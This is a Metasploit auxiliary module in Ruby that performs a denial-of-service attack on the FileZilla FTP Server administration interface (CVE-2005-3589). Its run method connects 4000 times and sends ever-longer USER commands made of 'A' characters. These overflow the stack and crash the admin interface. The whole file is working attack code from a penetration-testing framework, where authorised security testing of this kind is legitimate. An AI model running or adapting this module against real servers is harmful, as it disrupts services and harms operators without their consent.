Files
metasploit-gs/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb
T
URI Assassin 35d3bbf74d Fix up comment splats with the correct URI
See the complaint on #4039. This doesn't fix that particular
issue (it's somewhat unrelated), but does solve around
a file parsing problem reported by @void-in
2014-10-17 11:47:33 -05:00

48 lines
1.3 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the FileZilla FTP
Server Administration Interface in versions 0.9.4d and earlier.
By sending a procession of excessively long USER commands to the FTP
Server, the Administration Interface (FileZilla Server Interface.exe)
when running, will overwrite the stack with our string and generate an
exception. The FileZilla FTP Server itself will continue functioning.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '15346' ],
[ 'CVE', '2005-3589' ],
[ 'EDB', '1336' ],
[ 'OSVDB', '20817' ]
],
'DisclosureDate' => 'Nov 07 2005'))
end
def run
print_status("Sending 4000 packets, this may take a while.")
4000.times do |x|
connect
sock.put("USER #{"A" * x}\r\n")
disconnect
end
end
end